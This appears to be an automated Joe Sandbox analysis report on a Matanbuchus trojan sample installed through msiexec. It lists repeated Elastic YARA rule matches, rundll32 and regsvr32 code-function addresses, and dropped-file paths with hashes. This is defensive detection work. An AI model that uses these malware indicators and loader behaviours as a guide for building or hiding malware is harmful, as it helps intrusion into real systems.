Source: 0000000E.00000002.3140990675.0000000004C2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 0000000E.00000002.3140990675.0000000004C2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\58ee4b.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEF45.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEFA4.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIEFD4.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIF014.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{77E11148-E1F4-45C0-AAA9-BBA409C05474}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIF072.tmp	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIEF45.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6C55D860	4_2_6C55D860
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE49D20	4_2_7EE49D20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE29AB9	4_2_7EE29AB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE4F830	4_2_7EE4F830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE33740	4_2_7EE33740
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE54390	4_2_7EE54390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE61EE0	4_2_7EE61EE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE41EB0	4_2_7EE41EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3FD40	4_2_7EE3FD40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3DAC0	4_2_7EE3DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE6D91B	4_2_7EE6D91B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE7160D	4_2_7EE7160D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE6D5B6	4_2_7EE6D5B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE6D228	4_2_7EE6D228
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE6CEE0	4_2_7EE6CEE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE74EFE	4_2_7EE74EFE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE5AAF0	4_2_7EE5AAF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3A800	4_2_7EE3A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE7C640	4_2_7EE7C640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE664ED	4_2_7EE664ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE68490	4_2_7EE68490
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE3C160	4_2_7EE3C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_7EE49D20	4_2_7EE49D20
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_6BED51C0	6_2_6BED51C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF31EE0	6_2_7EF31EE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF11EB0	6_2_7EF11EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF19D20	6_2_7EF19D20
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1F830	6_2_7EF1F830
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0A800	6_2_7EF0A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0C160	6_2_7EF0C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F511EE0	11_2_7F511EE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4F1EB0	11_2_7F4F1EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4F9D20	11_2_7F4F9D20
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EC160	11_2_7F4EC160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EA800	11_2_7F4EA800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FF830	11_2_7F4FF830
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F191EB0	14_2_7F191EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1B1EE0	14_2_7F1B1EE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F199D20	14_2_7F199D20
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18C160	14_2_7F18C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F18A800	14_2_7F18A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19F830	14_2_7F19F830

Source: Joe Sandbox View	Dropped File: C:\Users\user\8f08\701188\701188.winmd 394401B1205D1CC5E6AF1F25183941428651E8DE0E715C5E954E25C6E49D4371
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\silver\libcurl.dll 394401B1205D1CC5E6AF1F25183941428651E8DE0E715C5E954E25C6E49D4371

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 7EE613A0 appears 37 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 7EE6F35D appears 140 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 7EF3F35D appears 121 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 7F1BF35D appears 125 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 7F51F35D appears 121 times

Source: 14.2.regsvr32.exe.7f150000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 14.2.regsvr32.exe.7f150000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 16.2.regsvr32.exe.7f3b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 16.2.regsvr32.exe.7f3b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 11.2.regsvr32.exe.7f4b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 11.2.regsvr32.exe.7f4b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 11.2.regsvr32.exe.7f4b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 11.2.regsvr32.exe.7f4b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 6.2.regsvr32.exe.7eed0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 6.2.regsvr32.exe.7eed0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 4.2.rundll32.exe.7ee00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 4.2.rundll32.exe.7ee00000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 14.2.regsvr32.exe.7f150000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 14.2.regsvr32.exe.7f150000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 6.2.regsvr32.exe.7eed0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 6.2.regsvr32.exe.7eed0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 16.2.regsvr32.exe.7f3b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 16.2.regsvr32.exe.7f3b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 4.2.rundll32.exe.7ee00000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 4.2.rundll32.exe.7ee00000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000010.00000002.3747374058.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000010.00000002.3747374058.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000010.00000002.3747924404.000000007F3B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000010.00000002.3747924404.000000007F3B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000004.00000002.4167564945.0000000005395000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000004.00000002.4167564945.0000000005395000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000E.00000002.3141366328.000000007F150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 0000000E.00000002.3141366328.000000007F150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000B.00000002.2555091731.0000000004A29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 0000000B.00000002.2555091731.0000000004A29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000006.00000002.2050235093.0000000004D82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000006.00000002.2050235093.0000000004D82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000E.00000002.3140990675.0000000004C2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 0000000E.00000002.3140990675.0000000004C2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
